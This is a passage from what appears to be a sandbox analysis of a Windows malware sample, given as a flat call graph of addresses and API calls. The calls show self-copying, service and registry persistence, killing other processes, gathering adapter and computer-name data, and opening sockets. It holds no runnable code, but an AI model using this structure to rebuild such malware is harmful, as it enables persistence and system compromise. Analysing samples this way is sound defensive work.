calls 9411->9412 9413 147fe8 9412->9413 9414 151bb0 2 API calls 9413->9414 9415 148004 9414->9415 9416 142f90 2 API calls 9415->9416 9417 148093 9416->9417 9418 151bb0 2 API calls 9417->9418 9419 1480a7 9418->9419 9420 142f90 2 API calls 9419->9420 9421 148106 9420->9421 9422 151bb0 2 API calls 9421->9422 9423 14818f 9422->9423 9424 142f90 2 API calls 9423->9424 9425 1481d1 9424->9425 9426 151bb0 2 API calls 9425->9426 9427 1481eb 9426->9427 9428 142f90 2 API calls 9427->9428 9429 148230 9428->9429 9430 151bb0 2 API calls 9429->9430 9431 148268 9430->9431 9432 151bb0 2 API calls 9431->9432 9433 1482b6 9432->9433 9434 152eb0 2 API calls 9433->9434 9435 148388 9434->9435 9614 1750e0 9435->9614 9437 14839b 9438 142f90 2 API calls 9437->9438 9439 1483c0 GetEnvironmentVariableA 9438->9439 9440 151bb0 2 API calls 9439->9440 9441 1483f9 CreateMutexA 9440->9441 9443 148480 CreateMutexA CreateMutexA 9441->9443 9445 148521 9443->9445 9446 148587 GetTickCount 9445->9446 9447 14868b 9445->9447 9449 1485a5 9446->9449 9621 155200 9447->9621 9451 142f90 2 API calls 9449->9451 9450 1486a4 GetCommandLineA 9452 1486cb 9450->9452 9454 1485bd 9451->9454 9453 142f90 2 API calls 9452->9453 9455 14874d 9453->9455 9456 151bb0 2 API calls 9454->9456 9458 151bb0 2 API calls 9455->9458 9457 148622 9456->9457 9457->9447 9459 14878c 9458->9459 9460 149235 GetCommandLineA 9459->9460 9462 142f90 2 API calls 9459->9462 9723 16b990 9460->9723 9464 1487dd 9462->9464 9465 151bb0 2 API calls 9464->9465 9467 148812 9465->9467 9466 149271 9726 14d500 lstrlen 9466->9726 9469 148842 9467->9469 9470 148832 9467->9470 9474 142f90 2 API calls 9469->9474 9891 142800 9470->9891 9472 149323 GetModuleFileNameA 9727 14a4e0 lstrlen 9472->9727 9475 1488ab 9474->9475 9477 151bb0 2 API calls 9475->9477 9476 1493ae 9479 14a4e0 2 API calls 9476->9479 9478 1488db 9477->9478 9480 148926 9478->9480 9481 148902 9478->9481 9482 14945a 9479->9482 9485 14e430 lstrlen 9480->9485 9483 142800 ExitProcess 9481->9483 9484 14a4e0 2 API calls 9482->9484 9483->9480 9500 14947b 9484->9500 9486 148961 9485->9486 9487 142f90 2 API calls 9486->9487 9488 148978 9487->9488 9492 151bb0 2 API calls 9488->9492 9489 149744 9730 163cf0 9489->9730 9491 1497b2 9493 1497d4 9491->9493 9494 1497b9 9491->9494 9516 1489cb 9492->9516 9739 169b00 9493->9739 9495 142800 ExitProcess 9494->9495 9495->9493 9497 14981d 9833 1708b0 GetSystemTimeAsFileTime 9497->9833 9499 149830 9835 1648d0 9499->9835 9500->9489 9917 158a70 9500->9917 9503 152120 6 API calls 9503->9516 9504 14956f 9923 169580 9504->9923 9506 151530 CreateFileA GetFileTime CloseHandle GetFileSize CloseHandle 9521 148b46 9506->9521 9507 14971a 9509 142800 ExitProcess 9507->9509 9508 1708b0 GetSystemTimeAsFileTime 9508->9516 9509->9489 9510 14958b 9510->9507 9511 142f90 2 API calls 9510->9511 9513 149651 9511->9513 9512 148b61 Sleep 9512->9521 9936 14d500 lstrlen 9513->9936 9515 149666 MessageBoxA 9526 151bb0 2 API calls 9515->9526 9516->9503 9516->9508 9517 148c99 Sleep 9516->9517 9516->9521 9525 148cd8 9516->9525 9517->9516 9519 149952 WSAStartup 9524 1499b6 9519->9524 9520 1498a8 9520->9519 9521->9506 9521->9512 9521->9516 9522 152120 6 API calls 9522->9525 9529 142f90 2 API calls 9524->9529 9532 1499ff 9524->9532 9525->9522 9527 148de6 9525->9527 9531 148d67 9525->9531 9528 1496ef 9526->9528 9907 151530 9527->9907 9534 142800 ExitProcess 9528->9534 9530 1499e4 9529->9530 9937 14c540 9530->9937 9531->9525 9531->9527 9894 14bbc0 9531->9894 9537 149a23 9532->9537 9538 149a7b 9532->9538 9534->9507 9942 15ee80 9537->9942 9545 149aa3 CloseHandle SetFileAttributesA CopyFileA 9538->9545 9555 149d65 9538->9555 9539 148e04 9543 1491a4 9539->9543 9544 148e5c GetModuleFileNameA SetFileAttributesA CopyFileA 9539->9544 9540 148d8c Sleep 9540->9531 9542 149a32 9546 149a53 9542->9546 9550 142800 ExitProcess 9542->9550 9557 16fa80 3 API calls 9543->9557 9547 142f90 2 API calls 9544->9547 9548 149c78 9545->9548 9549 149b1a SetFileAttributesA 9545->9549 9953 1426e0 9546->9953 9562 148eff 9547->9562 9560 163110 WaitForSingleObject 9548->9560 9552 149b73 9549->9552 9553 149b5d 9549->9553 9550->9546 9561 149c2a Sleep 9552->9561 9973 157a50 9552->9973 9961 150500 OpenSCManagerA 9553->9961 9567 149e57 SetFileAttributesA CopyFileA SetFileAttributesA 9555->9567 9568 149de9 9555->9568 9839 152120 9555->9839 9559 149210 9557->9559 9563 142800 ExitProcess 9559->9563 9564 149d15 9560->9564 9566 16fa80 3 API calls 9561->9566 9569 151bb0 2 API calls 9562->9569 9563->9460 9574 142800 ExitProcess 9564->9574 9566->9548 9850 14e430 9567->9850 9571 14bbc0 9 API calls 9568->9571 9573 148f61 9569->9573 9575 149e1a Sleep 9571->9575 9578 142f90 2 API calls 9573->9578 9588 14904a 9573->9588 9574->9555 9575->9555 9575->9567 9583 148fbf 9578->9583 9579 149113 SetFileAttributesA 9579->9543 9580 14913d SetFileAttributesA 9580->9543 9581 142f90 2 API calls 9584 149efd 9581->9584 9585 151bb0 2 API calls 9583->9585 9586 142f90 2 API calls 9584->9586 9585->9588 9587 149fbe 9586->9587 9589 151bb0 2 API calls 9587->9589 9588->9579 9588->9580 9590 14a039 9589->9590 9855 150dc0 9590->9855 9592 14a050 9593 151bb0 2 API calls 9592->9593 9594 14a06b 9593->9594 9859 151200 9594->9859 9597 142f90 2 API calls 9598 14a0ae 9597->9598 9599 142f90 2 API calls 9598->9599 9600 14a0c6 9599->9600 9882 175820 9600->9882 9602 14a0f2 9603 151bb0 2 API calls 9602->9603 9604 14a115 9603->9604 9605 151bb0 2 API calls 9604->9605 9606 14a127 9605->9606 9885 16fa80 9606->9885 9608 14a185 9609 14a24e CreateThread 9608->9609 9610 14a2a2 9609->9610 9611 14a2cd 9609->9611 10262 1622a0 9609->10262 9890 14c660 StartServiceCtrlDispatcherA 9610->9890 9613 14a310 Sleep 9611->9613 9613->9613 9615 175186 GetSystemTime 9614->9615 9616 175172 9614->9616 9617 1751be 9615->9617 9616->9615 9618 1708b0 GetSystemTimeAsFileTime 9617->9618 9619 1752a7 GetTickCount 9618->9619 9620 1752d4 9619->9620 9620->9437 9622 15521d 9621->9622 9623 1552b2 GetVersionExA 9622->9623 9983 14b7a0 AllocateAndInitializeSid 9623->9983 9629 142f90 2 API calls 9630 155652 9629->9630 10005 14d530 9630->10005 9633 151bb0 2 API calls 9638 155692 9633->9638 9634 155496 CreateDirectoryA 9636 142f90 2 API calls 9634->9636 9635 155357 9635->9634 9637 1554bb 9636->9637 9639 151bb0 2 API calls 9637->9639 10009 151d90 9638->10009 9642 15550a 9639->9642 9641 1556cb 9643 1556d6 DeleteFileA RemoveDirectoryA 9641->9643 9644 15575d 9641->9644 9642->9629 9643->9644 9645 14f0d0 6 API calls 9644->9645 9646 155776 9645->9646 9647 15581e CreateDirectoryA 9646->9647 9648 15585b 9647->9648 9649 14e430 lstrlen 9648->9649 9650 1558cb CreateDirectoryA 9649->9650 9651 155917 9650->9651 9652 142f90 2 API calls 9651->9652 9653 15592d 9652->9653 9654 142f90 2 API calls 9653->9654 9655 1559e9 9654->9655 9656 151bb0 2 API calls 9655->9656 9657 155a07 9656->9657 9658 14d530 9 API calls 9657->9658 9659 155a77 9658->9659 9660 151bb0 2 API calls 9659->9660 9661 155aaa 9660->9661 9662 151d90 5 API calls 9661->9662 9663 155ad7 9662->9663 9664 1564f5 9663->9664 9665 155b07 9663->9665 9666 155c42 9663->9666 9669 14e430 lstrlen 9664->9669 9668 142f90 2 API calls 9665->9668 9667 142f90 2 API calls 9666->9667 9670 155c61 9667->9670 9671 155b2d 9668->9671 9672 156549 SetFileAttributesA 9669->9672 9673 175820 wvsprintfA 9670->9673 9674 175820 wvsprintfA 9671->9674 9679 15657e 9672->9679 9675 155c87 9673->9675 9676 155b5a 9674->9676 9677 151bb0 2 API calls 9675->9677 9678 151bb0 2 API calls 9676->9678 9681 155b9f 9677->9681 9678->9681 9679->9450 9680 155bea 9682 155d53 CreateDirectoryA 9680->9682 9681->9680 9683 155d9a 9682->9683 9684 14e430 lstrlen 9683->9684 9685 155e4f CreateDirectoryA 9684->9685 9686 142f90 2 API calls 9685->9686 9687 155e9e 9686->9687 9688 142f90 2 API calls 9687->9688 9689 155f4c 9688->9689 9690 151bb0 2 API calls 9689->9690 9691 155f68 9690->9691 9692 14d530 9 API calls 9691->9692 9693 155f86 9692->9693 9694 151bb0 2 API calls 9693->9694 9695 155fcf 9694->9695 9696 151d90 5 API calls 9695->9696 9697 156002 9696->9697 9698 156485 9697->9698 9699 15600d GetTempPathA 9697->9699 9698->9664 10025 14d500 lstrlen 9699->10025 9701 15604f 9702 14e430 lstrlen 9701->9702 9703 1561cb CreateDirectoryA 9702->9703 9705 156219 9703->9705 9706 142f90 2 API calls 9705->9706 9707 156237 9706->9707 9708 142f90 2 API calls 9707->9708 9709 1562be 9708->9709 9710 151bb0 2 API calls 9709->9710 9711 156302 9710->9711 9712 14d530 9 API calls 9711->9712 9713 156360 9712->9713 9714 151bb0 2 API calls 9713->9714 9715 156372 9714->9715 9716 151d90 5 API calls 9715->9716 9717 1563b5 9716->9717 9717->9698 9718 1563c0 GetTempPathA 9717->9718 9719 1563ff 9718->9719 9720 142f90 2 API calls 9719->9720 9721 15642d 9720->9721 9722 151bb0 2 API calls 9721->9722 9722->9698 10061 14d500 lstrlen 9723->10061 9725 16b9c3 9725->9466 9726->9472 9728 14a53c 9727->9728 9729 14a54e CharLowerBuffA 9727->9729 9728->9729 9729->9476 9731 163d35 9730->9731 9732 14e430 lstrlen 9731->9732 9733 163d66 9732->9733 9734 142f90 2 API calls 9733->9734 9735 163d82 9734->9735 9736 151bb0 2 API calls 9735->9736 9737 163dd1 CreateFileA 9736->9737 9738 163e32 9737->9738 9738->9491 9740 169b93 9739->9740 9741 169c40 GetComputerNameA 9740->9741 9742 169c53 9741->9742 9743 169cbb 9741->9743 9744 142f90 2 API calls 9742->9744 9745 142f90 2 API calls 9743->9745 9746 169c7e 9744->9746 9747 169d55 9745->9747 9748 151bb0 2 API calls 9746->9748 9749 151bb0 2 API calls 9747->9749 9748->9743 9750 169db1 9749->9750 9751 14d530 9 API calls 9750->9751 9752 169dd5 9751->9752 10062 152c30 9752->10062 9754 169e08 10065 15a930 9754->10065 9756 169f23 10107 14d500 lstrlen 9756->10107 9758 169f65 10108 1701a0 9758->10108 9762 169fcf 9763 152c30 8 API calls 9762->9763 9764 169ffe 9763->9764 9765 1701a0 9 API calls 9764->9765 9766 16a0a3 9765->9766 9767 171050 8 API calls 9766->9767 9768 16a0b2 9767->9768 9769 152c30 8 API calls 9768->9769 9770 16a0dd 9769->9770 9771 1701a0 9 API calls 9770->9771 9772 16a118 9771->9772 9773 171050 8 API calls 9772->9773 9774 16a127 9773->9774 9775 152c30 8 API calls 9774->9775 9776 16a16c 9775->9776 9777 1701a0 9 API calls 9776->9777 9778 16a18b 9777->9778 9779 171050 8 API calls 9778->9779 9780 16a197 9779->9780 9781 152c30 8 API calls 9780->9781 9782 16a1e1 9781->9782 9783 1701a0 9 API calls 9782->9783 9784 16a204 9783->9784 9785 171050 8 API calls 9784->9785 9786 16a213 9785->9786 9787 152c30 8 API calls 9786->9787 9788 16a248 9787->9788 9789 142f90 2 API calls 9788->9789 9790 16a280 9789->9790 9791 1701a0 9 API calls 9790->9791 9792 16a2bf 9791->9792 9793 171050 8 API calls 9792->9793 9794 16a2ce 9793->9794 9795 151bb0 2 API calls 9794->9795 9796 16a2f5 9795->9796 9797 152c30 8 API calls 9796->9797 9798 16a31b 9797->9798 9799 1701a0 9 API calls 9798->9799 9800 16a347 9799->9800 9801 171050 8 API calls 9800->9801 9802 16a353 9801->9802 9803 152c30 8 API calls 9802->9803 9804 16a391 9803->9804 9805 1701a0 9 API calls 9804->9805 9806 16a3aa 9805->9806 9807 171050 8 API calls 9806->9807 9808 16a3b9 9807->9808 9809 152c30 8 API calls 9808->9809 9810 16a402 9809->9810 10115 152f60 9810->10115 9814 16a465 9815 1701a0 9 API calls 9814->9815 9816 16a471 9815->9816 9817 171050 8 API calls 9816->9817 9818 16a480 9817->9818 9819 152c30 8 API calls 9818->9819 9820 16a4d1 9819->9820 9821 1701a0 9 API calls 9820->9821 9822 16a502 9821->9822 9823 171050 8 API calls 9822->9823 9824 16a511 9823->9824 10124 1597b0 9824->10124 9826 16a54f 10151 15d990 9826->10151 9828 16a575 10154 154290 9828->10154 9830 16a5b3 10158 160480 9830->10158 9832 16a63b 9832->9497 9834 170958 __aulldiv 9833->9834 9834->9499 9836 164926 9835->9836 10195 14d500 lstrlen 9836->10195 9838 164948 9838->9520 9840 152196 CreateToolhelp32Snapshot 9839->9840 9841 15218c 9839->9841 9842 1521fe Process32First 9840->9842 9843 152450 9840->9843 9841->9840 9845 15240d FindCloseChangeNotification 9842->9845 9846 15227a 9842->9846 9843->9555 9845->9843 9847 14a4e0 2 API calls 9846->9847 9848 152346 Process32Next 9846->9848 9849 15239c 9846->9849 9847->9846 9848->9846 9848->9849 9849->9845 9851 1648d0 lstrlen 9850->9851 9852 14e451 9851->9852 9853 149ee1 9852->9853 10196 14d500 lstrlen 9852->10196 9853->9581 9856 150de7 9855->9856 9857 150f4e CreateFileA 9856->9857 9858 150f80 9857->9858 9858->9592 9860 151254 9859->9860 9861 15126b 9859->9861 9862 150920 9 API calls 9860->9862 9863 142f90 2 API calls 9861->9863 9862->9861 9864 1512b3 9863->9864 9865 150dc0 CreateFileA 9864->9865 9866 1512cd 9865->9866 9867 151bb0 2 API calls 9866->9867 9868 15131f 9867->9868 9869 151378 Sleep 9868->9869 9881 151420 9868->9881 9870 142f90 2 API calls 9869->9870 9873 1513b7 9870->9873 9871 151464 10197 1510e0 9871->10197 9872 14a090 9872->9597 9875 150dc0 CreateFileA 9873->9875 9877 1513cc 9875->9877 9876 15147c 10202 175370 CloseHandle 9876->10202 9879 151bb0 2 API calls 9877->9879 9879->9881 9880 1514a0 9880->9872 9881->9871 9881->9872 9883 17587d wvsprintfA 9882->9883 9884 17586d 9882->9884 9883->9602 9884->9883 9886 16faaa 9885->9886 9887 16fb6a CreateProcessA 9886->9887 9888 16fc8f 9887->9888 9889 16fbff CloseHandle CloseHandle 9887->9889 9888->9608 9889->9608 9890->9611 9892 14281d 9891->9892 9893 14283e ExitProcess 9892->9893 9895 14bbe1 CreateToolhelp32Snapshot 9894->9895 9897 14bf47 9895->9897 9898 14bcbb Process32First 9895->9898 9897->9540 9899 14bf1a CloseHandle 9898->9899 9900 14bd05 9898->9900 9899->9897 9901 14a4e0 2 API calls 9900->9901 9902 14bdbb OpenProcess 9900->9902 9903 14bedd Process32Next 9900->9903 9906 14be67 CloseHandle 9900->9906 9901->9900 9902->9900 9904 14be02 TerminateProcess 9902->9904 9903->9900 9905 14bf19 9903->9905 9904->9900 9904->9906 9905->9899 9906->9900 9908 151561 9907->9908 9909 15157f CreateFileA 9907->9909 9908->9909 9910 151611 9909->9910 9911 151657 9910->9911 9912 151673 GetFileTime 9910->9912 9911->9539 9913 151694 CloseHandle 9912->9913 9914 1516bf __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9912->9914 9913->9539 9915 151771 GetFileSize CloseHandle 9914->9915 9916 1517be 9915->9916 9916->9539 9918 158a95 9917->9918 10204 14ca40 9918->10204 9920 158b1d 9921 16fa80 3 API calls 9920->9921 9922 158b65 9921->9922 9922->9504 9924 1695a9 9923->9924 9932 169902 9923->9932 10242 14d500 lstrlen 9924->10242 9926 16965d Sleep 9927 1696b9 9926->9927 9928 142f90 2 API calls 9927->9928 9929 1696e9 9928->9929 9930 151bb0 2 API calls 9929->9930 9931 16979d FindFirstFileA 9930->9931 9933 1697d6 9931->9933 9932->9510 9933->9932 9934 169877 DeleteFileA FindNextFileA 9933->9934 9934->9933 9935 1698d9 FindClose 9934->9935 9935->9932 9936->9515 9938 163110 WaitForSingleObject 9937->9938 9939 14c562 9938->9939 9940 142800 ExitProcess 9939->9940 9941 14c578 9940->9941 9943 15ee9d 9942->9943 9944 14e430 lstrlen 9943->9944 9945 15eef8 9944->9945 9946 142f90 2 API calls 9945->9946 9947 15ef29 9945->9947 9948 15ef91 9946->9948 9947->9542 9949 151bb0 2 API calls 9948->9949 9950 15f001 9949->9950 10243 14d000 9950->10243 9952 15f020 9952->9542 9954 1708b0 GetSystemTimeAsFileTime 9953->9954 9955 142703 9954->9955 9956 1427c8 9955->9956 9957 1708b0 GetSystemTimeAsFileTime 9955->9957 9956->9538 9959 142751 9957->9959 9958 142770 Sleep 9958->9959 9959->9956 9959->9958 9960 1708b0 GetSystemTimeAsFileTime 9959->9960 9960->9959 9962 15055f CreateServiceA 9961->9962 9963 1507be 9961->9963 9964 1505be 9962->9964 9963->9552 9965 1506bc OpenServiceA 9964->9965 9966 1505d8 ChangeServiceConfig2A StartServiceA 9964->9966 9970 150716 StartServiceA CloseServiceHandle 9965->9970 9971 15075e CloseServiceHandle 9965->9971 9967 15067e CloseServiceHandle 9966->9967 9967->9971 9970->9971 9971->9963 9974 157ab7 9973->9974 9975 142f90 2 API calls 9974->9975 9976 157b71 RegOpenKeyA 9975->9976 9977 151bb0 2 API calls 9976->9977 9979 157bcb 9977->9979 9978 157cc0 RegCloseKey 9980 149c15 9978->9980 9979->9978 10261 14d500 lstrlen 9979->10261 9980->9561 9982 157c87 RegSetValueExA 9982->9978 9984 14b84e 9983->9984 9985 14b8ee 9984->9985 9986 14b86a CheckTokenMembership 9984->9986 9989 14fbc0 9985->9989 9987 14b8b4 FreeSid 9986->9987 9988 14b887 9986->9988 9987->9985 9988->9987 9990 14fc3c 9989->9990 9991 142f90 2 API calls 9990->9991 9992 14fc76 GetProcAddress 9991->9992 9993 151bb0 2 API calls 9992->9993 9994 14fcb4 9993->9994 9995 14fcc5 GetCurrentProcess 9994->9995 9996 14fcdc 9994->9996 9995->9996 9996->9642 9997 14f0d0 GetWindowsDirectoryA 9996->9997 9998 14f122 9997->9998 9999 14f1d3 9998->9999 10000 142f90 2 API calls 9998->10000 9999->9635 10001 14f170 10000->10001 10002 151bb0 2 API calls 10001->10002 10003 14f1bb 10002->10003 10026 14d500 lstrlen 10003->10026 10006 14d54a 10005->10006 10027 14fa50 10006->10027 10010 151d9d 10009->10010 10011 163110 WaitForSingleObject 10010->10011 10012 151e0c 10011->10012 10013 151e23 10012->10013 10014 151e4c CreateFileA 10012->10014 10016 16fcc0 ReleaseMutex 10013->10016 10015 151e93 10014->10015 10020 151ed1 10014->10020 10017 16fcc0 ReleaseMutex 10015->10017 10018 151e39 10016->10018 10019 151eaf 10017->10019 10018->9641 10019->9641 10021 151fe8 WriteFile 10020->10021 10021->10020 10022 152069 FindCloseChangeNotification 10021->10022 10023 16fcc0 ReleaseMutex 10022->10023 10024 1520a1 10023->10024 10024->9641 10025->9701 10026->9999 10028 14fa7e 10027->10028 10033 14d500 lstrlen 10028->10033 10030 14fae4 10034 152df0 10030->10034 10032 14d55f 10032->9633 10033->10030 10037 15bff0 10034->10037 10036 152e3e 10036->10032 10038 15c006 10037->10038 10039 15c00d 10038->10039 10042 163f00 10038->10042 10039->10036 10041 15c04f 10041->10036 10043 163f30 10042->10043 10044 163f46 10043->10044 10046 150110 10043->10046 10044->10041 10047 150128 10046->10047 10048 15038a 10047->10048 10049 150266 10047->10049 10054 150367 10047->10054 10056 1568d0 10048->10056 10052 14e2c0 2 API calls 10049->10052 10051 1503a9 10051->10054 10053 150276 10052->10053 10055 152eb0 2 API calls 10053->10055 10054->10044 10055->10054 10057 156901 10056->10057 10058 156926 GetProcessHeap RtlReAllocateHeap 10057->10058 10059 156966 GetProcessHeap HeapAlloc 10057->10059 10058->10051 10059->10051 10061->9725 10063 154290 8 API calls 10062->10063 10064 152c4d 10063->10064 10064->9754 10066 15a998 10065->10066 10067 142f90 2 API calls 10066->10067 10068 15aa6c 10067->10068 10069 151bb0 2 API calls 10068->10069 10070 15aab7 GetProcessHeap 10069->10070 10071 15ab54 10070->10071 10072 15aaeb 10070->10072 10073 142f90 2 API calls 10071->10073 10072->9756 10074 15ab6a LoadLibraryA 10073->10074 10075 15abb1 10074->10075 10076 151bb0 2 API calls 10075->10076 10078 15abcb 10076->10078 10077 15abf6 10077->9756 10078->10077 10079 142f90 2 API calls 10078->10079 10080 15ac99 GetProcAddress 10079->10080 10081 151bb0 2 API calls 10080->10081 10082 15acd9 10081->10082 10083 15acf0 FreeLibrary 10082->10083 10084 15ad28 HeapAlloc 10082->10084 10083->9756 10085 15ad78 10084->10085 10086 15ada4 FreeLibrary 10085->10086 10087 15adfa GetAdaptersInfo 10085->10087 10086->9756 10088 15ae30 HeapFree 10087->10088 10089 15af4b GetAdaptersInfo 10087->10089 10091 15ae77 10088->10091 10092 15ae8a HeapAlloc 10088->10092 10097 15afa4 10089->10097 10106 15b22b 10089->10106 10091->10092 10093 15af24 10092->10093 10094 15aeaa FreeLibrary 10092->10094 10093->10089 10096 15aedf 10094->10096 10096->9756 10099 142f90 2 API calls 10097->10099 10098 15b6ad HeapFree FreeLibrary 10098->9756 10100 15affe 10099->10100 10101 151bb0 2 API calls 10100->10101 10102 15b074 10101->10102 10103 142f90 2 API calls 10102->10103 10102->10106 10104 15b249 10103->10104 10105 151bb0 2 API calls 10104->10105 10105->10106 10106->10098 10107->9758 10163 15a810 10108->10163 10111 171050 10112 171071 10111->10112 10113 154290 8 API calls 10112->10113 10114 17107f 10113->10114 10114->9762 10116 152f95 10115->10116 10117 142f90 2 API calls 10116->10117 10118 152fd0 10117->10118 10119 151bb0 2 API calls 10118->10119 10120 153030 10119->10120 10121 156600 10120->10121 10170 14d500 lstrlen 10121->10170 10123 156655 10123->9814 10125 1597e8 10124->10125 10126 142f90 2 API calls 10125->10126 10127 15987a 10126->10127 10128 142f90 2 API calls 10127->10128 10129 1598a9 10128->10129 10130 142f90 2 API calls 10129->10130 10131 1598d7 10130->10131 10132 151bb0 2 API calls 10131->10132 10133 159917 10132->10133 10134 142f90 2 API calls 10133->10134 10135 159955 10134->10135 10136 151bb0 2 API calls 10135->10136 10137 1599ab 10136->10137 10138 151bb0 2 API calls 10137->10138 10142 159a2b 10138->10142 10139 15a5a1 10140 151bb0 2 API calls 10139->10140 10144 15a606 10140->10144 10143 141ca0 9 API calls 10142->10143 10150 159f98 10142->10150 10171 156810 10142->10171 10143->10142 10144->9826 10145 15a428 10145->10139 10148 156810 8 API calls 10145->10148 10174 141ca0 10145->10174 10146 156810 8 API calls 10146->10150 10148->10145 10149 141ca0 9 API calls 10149->10150 10150->10139 10150->10145 10150->10146 10150->10149 10152 15bff0 8 API calls 10151->10152 10153 15d997 10152->10153 10153->9828 10155 1542e3 10154->10155 10156 15bff0 8 API calls 10155->10156 10157 15432f 10156->10157 10157->9830 10185 164450 10158->10185 10160 1604ab 10161 154290 8 API calls 10160->10161 10162 160589 10160->10162 10161->10162 10162->9832 10164 15a81c 10163->10164 10169 14d500 lstrlen 10164->10169 10166 15a8a0 10167 152df0 8 API calls 10166->10167 10168 15a8ac 10167->10168 10168->10111 10169->10166 10170->10123 10180 151c30 10171->10180 10173 15681e 10173->10142 10175 14d5d0 10174->10175 10184 14d500 lstrlen 10175->10184 10177 14d630 10178 154290 8 API calls 10177->10178 10179 14d63c 10178->10179 10179->10145 10181 151c67 10180->10181 10182 15bff0 8 API calls 10181->10182 10183 151c89 10182->10183 10183->10173 10184->10177 10191 1700f0 10185->10191 10187 1644d7 10187->10160 10188 150920 9 API calls 10189 164475 10188->10189 10189->10187 10189->10188 10190 16457d 10189->10190 10190->10160 10192 170149 10191->10192 10193 17010b 10191->10193 10192->10189 10194 15d990 8 API calls 10193->10194 10194->10192 10195->9838 10196->9853 10198 151115 10197->10198 10199 151126 10197->10199 10198->9876 10200 151137 10199->10200 10201 15114e WriteFile 10199->10201 10200->9876 10201->9876 10203 1753d4 10202->10203 10203->9880 10205 14caa0 10204->10205 10206 14cae7 CreateFileA 10205->10206 10207 14cb3d ReadFile 10206->10207 10211 14cf5d 10206->10211 10208 14cbbc CloseHandle 10207->10208 10209 14cb79 10207->10209 10233 152a20 10208->10233 10209->10208 10211->9920 10212 14cbf5 GetTickCount 10235 171520 10212->10235 10214 14cc2a 10239 14d500 lstrlen 10214->10239 10216 14cc81 10217 142f90 2 API calls 10216->10217 10218 14ccd1 10217->10218 10219 151bb0 2 API calls 10218->10219 10220 14cd00 10219->10220 10222 142f90 2 API calls 10220->10222 10223 14cddc CreateFileA 10220->10223 10225 14cd54 10222->10225 10223->10211 10224 14cef5 WriteFile 10223->10224 10226 14cf46 CloseHandle 10224->10226 10227 14cf32 10224->10227 10240 14d500 lstrlen 10225->10240 10226->10211 10227->10226 10229 14cd6c 10230 175820 wvsprintfA 10229->10230 10231 14cd77 10230->10231 10232 151bb0 2 API calls 10231->10232 10232->10223 10234 152a3b 10233->10234 10234->10212 10236 171546 10235->10236 10241 14d500 lstrlen 10236->10241 10238 1715bf 10238->10214 10239->10216 10240->10229 10241->10238 10242->9926 10245 14d00d 10243->10245 10244 15d990 8 API calls 10246 14d0dd 10244->10246 10245->10244 10247 163110 WaitForSingleObject 10246->10247 10248 14d0f2 CreateFileA 10247->10248 10249 14d140 10248->10249 10250 14d131 10248->10250 10253 14d1b9 ReadFile 10249->10253 10254 150110 8 API calls 10249->10254 10255 14d3e3 CloseHandle 10249->10255 10256 154290 8 API calls 10249->10256 10257 14d294 CloseHandle 10249->10257 10251 16fcc0 ReleaseMutex 10250->10251 10252 14d410 10251->10252 10252->9952 10253->10249 10254->10249 10255->10250 10256->10249 10259 16fcc0 ReleaseMutex 10257->10259 10260 14d322 10259->10260 10260->9952 10261->9982 10263 1622fb 10262->10263 10264 1750e0 3 API calls 10263->10264 10265 16247d 10264->10265 10266 169580 10 API calls 10265->10266 10267 1624c2 10266->10267 10268 14e430 lstrlen 10267->10268 10269 1624e6 10268->10269 10270 142f90 2 API calls 10269->10270 10271 162511 10270->10271 10272 151bb0 2 API calls 10271->10272 10277 162561 10272->10277 10273 1708b0 GetSystemTimeAsFileTime 10273->10277 10274 15d990 8 API calls 10275 162bec Sleep 10274->10275 10409 158cf0 10275->10409 10277->10273 10277->10274 10278 152120 6 API calls 10277->10278 10279 16fa80 3 API calls 10277->10279 10281 151200 13 API calls 10277->10281 10282 142f90 2 API calls 10277->10282 10294 164af0 10277->10294 10306 160d80 10277->10306 10278->10277 10279->10277 10281->10277 10282->10277 10284 14d760 52 API calls 10293 162730 10284->10293 10285 15d0f0 33 API calls 10285->10293 10286 14d530 9 API calls 10286->10293 10287 171050 8 API calls 10287->10293 10288 152c30 8 API calls 10288->10293 10290 142f90 GetProcessHeap RtlAllocateHeap 10290->10293 10291 160d80 22 API calls 10291->10293 10292 151bb0 GetProcessHeap RtlFreeHeap 10292->10293 10293->10277 10293->10284 10293->10285 10293->10286 10293->10287 10293->10288 10293->10290 10293->10291 10293->10292 10417 15c770 10293->10417 10295 164b32 10294->10295 10296 142f90 2 API calls 10295->10296 10297 164b55 10296->10297 10298 142f90 2 API calls 10297->10298 10299 164b78 10298->10299 10421 1571e0 10299->10421 10302 151bb0 2 API calls 10303 164bb0 10302->10303 10304 151bb0 2 API calls 10303->10304 10305 164bc5 10304->10305 10305->10277 10307 160d9a 10306->10307 10308 1708b0 GetSystemTimeAsFileTime 10307->10308 10309 160f04 10308->10309 10427 14d500 lstrlen 10309->10427 10312 160f89 10312->10293 10313 160f6d 10313->10312 10428 14d500 lstrlen 10313->10428 10314 16110c 10429 14d500 lstrlen 10314->10429 10316 162250 10316->10293 10317 16111a 10317->10316 10318 142f90 2 API calls 10317->10318 10319 161195 10318->10319 10320 14d530 9 API calls 10319->10320 10321 1611c3 10320->10321 10322 151bb0 2 API calls 10321->10322 10323 1611d5 10322->10323 10325 142f90 2 API calls 10323->10325 10352 16134c 10323->10352 10324 1701a0 9 API calls 10326 1613d8 10324->10326 10327 161226 10325->10327 10328 171050 8 API calls 10326->10328 10329 15a810 9 API calls 10327->10329 10330 1613e4 10328->10330 10332 161258 10329->10332 10331 142f90 2 API calls 10330->10331 10333 161422 10331->10333 10336 151bb0 2 API calls 10332->10336 10334 1701a0 9 API calls 10333->10334 10335 16144a 10334->10335 10337 171050 8 API calls 10335->10337 10339 161288 10336->10339 10338 161456 10337->10338 10340 151bb0 2 API calls 10338->10340 10339->10352 10434 16b500 10339->10434 10342 161478 10340->10342 10347 1701a0 9 API calls 10342->10347 10343 1612fa 10344 142f90 2 API calls 10343->10344 10345 161310 10344->10345 10346 14d530 9 API calls 10345->10346 10348 161328 10346->10348 10349 1614e2 10347->10349 10350 151bb0 2 API calls 10348->10350 10351 171050 8 API calls 10349->10351 10350->10352 10353 1614f1 10351->10353 10352->10324 10357 142f90 2 API calls 10353->10357 10392 1616c2 10353->10392 10354 142f90 2 API calls 10355 161702 10354->10355 10356 1701a0 9 API calls 10355->10356 10358 161728 10356->10358 10359 161595 10357->10359 10360 171050 8 API calls 10358->10360 10361 1701a0 9 API calls 10359->10361 10362 161734 10360->10362 10363 1615d0 10361->10363 10366 151bb0 2 API calls 10362->10366 10364 171050 8 API calls 10363->10364 10365 1615df 10364->10365 10369 142f90 2 API calls 10365->10369 10367 16174e 10366->10367 10368 161786 socket 10367->10368 10370 